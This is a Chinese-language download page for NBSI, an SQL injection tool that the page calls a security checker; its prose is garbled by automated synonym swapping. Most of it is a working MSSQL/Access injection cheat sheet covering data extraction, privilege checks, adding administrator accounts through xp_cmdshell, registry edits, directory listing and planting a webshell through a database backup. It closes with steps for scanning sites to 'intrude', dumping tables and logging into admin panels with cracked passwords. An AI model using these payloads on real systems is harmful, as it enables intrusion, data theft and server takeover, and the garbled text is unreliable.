nbsi民间版是一款专为呵护网站同样艰深运行清静而妄想开拓的页面简洁悭吝,适用规模普遍,功能强盛,操作逻辑重大易上手的专网站清静倾向检测工具。nbsi民间版基于开源sql注入合成器由VB语言编写ASP注入倾向检测辅助用户快捷检测网站中存在的倾向并揭示修复。软件功能单薄切检测服从精准,速率快是网站用户魔难网站倾向修复的必备工具。
nbsi
1.nbsi民间版可能分说是否有注入
;and 1=1
;and 1=2
2.开始分说是否是mssql
;and user>0
3.nbsi民间版可能分说数据库零星
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.注入参数是字符
'and [查问条件] and ''='
5.搜查时没过滤参数的
'and [查问条件] and '%25'='
6.猜数据库
;and (Select Count(*) from [数据库名])>0
7.猜字段
;and (Select Count(字段名) from 数据库名)>0
8.猜字段中记实长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限妄想(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--
11.削减mssql以及零星的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
;--
;exec master.dbo.xp_cmdshell 'net user username
password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in('上步患上到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 取安妥前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 取患上子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 取患上所有子目录的目录树妄想
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 魔难文件的内容
13.mssql中的存储历程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersionRun' 以多个记实整方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'Co妹妹onFilesDir' 返回拟订键的值
xp_regwrite 根键,子键, 值名, 值规范, 值
值规范有2种REG_SZ 展现字符型,REG_dwORD 展现整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName' 删除了某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersiontestkey' 删除了键,搜罗该键下所有值
14.mssql的backup建树webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:l.asp';
15.mssql内置函数
;and (select @@version)>0 取患上Windows的版本号
;and user_name()='dbo' 分说之后零星的衔接用户是否sa
;and (select user_name())>0 爆之后零星的衔接用户
;and (select db_name())>0 患上到之后衔接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:wwwtestl.asp';
1.首先在安定洋下载中间下载nbsi最新版软件包并解压
2.双击nbsi.exe挨次
3.软件掀开界面
nbsi
4.此软件为绿色版软件以是无需装置
1.下载并运行NBSI 3.0,双击NBSI.exe运用挨次,即可掀开NBSI操作主窗口,如图3-16所示。假如知道一个注入点,就能在注入地址处填入注入点的URL,否则将需要对于入侵网站妨碍扫描。在“工具栏”中单击“网站扫描”按钮,即可掀开“网站扫描”窗口,
nbsi
2.在“注入地址”中输入要入侵的网站地址,抉择“快捷扫描”单选项,单击“扫描”按钮,即可对于该网站妨碍扫描。假如在扫描历程中发现注入倾向,则将倾向地址及注入性的高下表当初“扫描服从”列表中。
3.在“扫描服从”列表中单击要注入的网址,即可将其削减到“注入地址”文本框中。单击“注入地址”文本框前面的“注入合成”按钮,即可掀开“注入合成”窗口。
4.勾选post复选框,在“特色字符”文沿海域中输入响应的特色字符,单击“检测”按钮,即可对于该网址妨碍检测,其检测服从。待检测竣预先,假如“未检测到注入倾向”单选项入选中,则该网址就不能被用来妨碍注入侵略。
5.在“已经猜解表名”栏目中单击“猜解表名”按钮,即可掀开“SI揭示信息”揭示框。
揭示
这里患上到的是一个数字型+Access数据库的注入点,ASP+MSSQL型的注入措施与其同样,都可能在注入乐成之后去读取数据库的信息。
6.单击“判断”按钮,即可对于选定的表单猜解。待猜解竣事之后,将会在“已经猜解表名”文本框中展现出数据库的表名,
7.在选中要猜解的数据表后,单击“猜解列名”按钮,即可患上到该数据表所包枚举的相关信息,如图3-24所示。在勾选要猜解列名前面的复选框后,单击“猜解记实”按钮,即可患上到该列名中搜罗的详细信息。
8.在NBSI主窗口的“工具栏”中单击“扫描及工具”按钮,即可进入“扫描及工具”窗口。
9.将前面扫描进去的标识为“可能性:较高”的网址复制到“扫描地址”文本框中;勾选“由根目录开始扫描”复选框,单击“开始扫描”按钮,即可将可能存在的规画布景扫描进去,把扫描服从表当初“可能存在的规画布景”列表中。
艰深情景下,扫描进去的网站规画布景不止一个,此时可抉择默认规画页面,并运用破解出用户名以及明码进入其规画布景。假如不能乐成登录,则需逐个测试扫描进去的规画布景。